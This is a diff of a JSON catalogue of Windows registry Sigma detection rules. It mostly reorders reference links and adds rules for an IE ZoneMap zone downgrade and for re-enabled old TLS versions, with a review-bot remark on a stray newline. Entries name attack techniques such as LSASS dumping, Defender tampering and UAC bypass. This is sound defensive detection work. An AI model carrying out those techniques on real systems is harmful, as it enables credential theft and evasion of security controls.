+ "https://github.com/gtworek/PSBits/tree/master/SIP",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml"
 ],
 "tags": [
@@ -18644,9 +18917,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml"
 ],
 "tags": [
@@ -18879,8 +19152,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
 "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
+ "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml"
 ],
 "tags": [
@@ -18936,8 +19209,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp",
 "https://twitter.com/WhichbufferArda/status/1543900539280293889",
+ "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml"
 ],
 "tags": [
@@ -19079,8 +19352,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/inversecos/status/1494174785621819397",
 "Internal Research",
+ "https://twitter.com/inversecos/status/1494174785621819397",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml"
 ],
 "tags": [
@@ -19180,8 +19453,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
 "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
+ "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml"
 ],
 "tags": [
@@ -19217,8 +19490,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml"
 ],
 "tags": [
@@ -19431,10 +19704,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://persistence-info.github.io/Data/userinitmprlogonscript.html",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml"
 ],
 "tags": [
@@ -19574,13 +19847,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
- "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
 "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
- "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
 "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
+ "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
+ "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml"
 ],
 "tags": [
@@ -19648,9 +19921,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml"
 ],
 "tags": [
@@ -19684,9 +19957,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml"
 ],
 "tags": [
@@ -19752,8 +20025,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
 "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
+ "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml"
 ],
 "tags": [
@@ -19938,8 +20211,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
 "https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise",
+ "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
 "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml"
 ],
@@ -20020,9 +20293,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
- "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
 "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
+ "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/",
+ "https://learn.microsoft.com/en-us/windows/win32/api/winevt/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml"
 ],
 "tags": [
@@ -20056,9 +20329,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml"
 ],
 "tags": [
@@ -20091,10 +20364,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html",
- "https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html",
 "https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection",
 "https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine",
+ "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html",
+ "https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml"
 ],
 "tags": [
@@ -20262,6 +20535,32 @@
 "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085",
 "value": "Potential Persistence Via Custom Protocol Handler"
 },
+ {
+ "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)",
+ "creation_date": "2023/09/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_ie_security_zone_protocol_defaults_downgrade.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/JAMESWT_MHT/status/1699042827261391247",
+ "https://twitter.com/M_haggis/status/1699056847154725107",
+ "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries",
+ "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "3fd4c8d7-8362-4557-a8e6-83b29cc0d724",
+ "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols"
+ },
 {
 "description": "Attempts to detect system changes made by Blue Mockingbird",
 "meta": {
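Review bot: The added `description` for the "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols" entry ends with a literal `\n` (`...the same level of trust as files stored locally.\n`), whereas the sibling entry added in the next hunk ("Old TLS1.0/TLS1.1 Protocol Version Enabled") has no trailing newline, so consumers rendering `description` get inconsistent output. The stray newline most likely comes from a YAML block scalar in the upstream rule; if this file is produced by a conversion script, the fix belongs there (strip trailing whitespace from `description` before serialising), otherwise drop the `\n` here: `...the same level of trust as files stored locally."`. Worth checking the rest of this commit for the same artefact, since it will recur for every rule whose description uses a block scalar.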
@@ -20303,6 +20602,29 @@
 "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27",
 "value": "Blue Mockingbird - Registry"
 },
+ {
+ "description": "Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/09/05",
+ "falsepositive": [
+ "Legitimate enabling of the old tls versions due to incompatibility"
+ ],
+ "filename": "registry_set_tls_protocol_old_version_enabled.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "439957a7-ad86-4a8f-9705-a28131c6821b",
+ "value": "Old TLS1.0/TLS1.1 Protocol Version Enabled"
+ },
 {
 "description": "Detect the creation of a service with a service binary located in a uncommon directory",
 "meta": {
@@ -20382,13 +20704,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html",
 "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
 "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
 "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting",
+ "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml"
 ],
 "tags": [
@@ -20421,8 +20743,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70",
 "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us",
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml"
 ],
 "tags": [
@@ -20455,8 +20777,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store",
 "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml"
 ],
 "tags": [
@@ -20522,8 +20844,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
 "https://github.com/hfiref0x/UACME",
+ "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml"
 ],
 "tags": [
@@ -20558,8 +20880,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
 "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53",
+ "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml"
 ],
 "tags": [
@@ -20609,9 +20931,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/inversecos/status/1494174785621819397",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://twitter.com/inversecos/status/1494174785621819397",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml"
 ],
 "tags": [
@@ -20701,9 +21023,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
 "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/",
 "https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml"
 ],
 "tags": [
@@ -20902,8 +21224,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
 "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml"
 ],
 "tags": [
@@ -21030,9 +21352,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml"
 ],
 "tags": [
@@ -21065,8 +21387,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/mpnotify.html",
 "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek",
+ "https://persistence-info.github.io/Data/mpnotify.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml"
 ],
 "tags": [
@@ -21090,9 +21412,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml"
 ],
 "tags": [
@@ -21216,9 +21538,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml"
 ],
 "tags": [
@@ -21251,8 +21573,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx",
 "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md",
+ "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml"
 ],
 "tags": [
@@ -21285,9 +21607,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/deepinstinct/Lsass-Shtinkering",
- "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
 "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps",
+ "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml"
 ],
 "tags": [
@@ -21320,9 +21642,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
+ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml"
 ],
 "tags": [
@@ -21364,9 +21686,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview",
 "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/",
+ "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml"
 ],
 "tags": [
@@ -21433,8 +21755,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
 "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/",
+ "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml"
 ],
@@ -21504,8 +21826,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml"
 ],
 "tags": [
@@ -21569,9 +21891,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://www.sans.org/cyber-security-summit/archives",
 "https://twitter.com/jamieantisocial/status/1304520651248668673",
 "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors",
- "https://www.sans.org/cyber-security-summit/archives",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml"
 ],
 "tags": [
@@ -21799,8 +22121,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md",
+ "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml"
 ],
 "tags": [
@@ -21866,9 +22188,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/inversecos/status/1494174785621819397",
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
+ "https://twitter.com/inversecos/status/1494174785621819397",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml"
 ],
 "tags": [
@@ -21901,8 +22223,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/lsaaextension.html",
 "https://twitter.com/0gtweet/status/1476286368385019906",
+ "https://persistence-info.github.io/Data/lsaaextension.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml"
 ],
 "tags": [
@@ -22063,8 +22385,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml"
 ],
 "tags": [
@@ -22165,8 +22487,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/",
 "https://persistence-info.github.io/Data/autodialdll.html",
+ "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml"
 ],
 "tags": [
@@ -22223,8 +22545,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
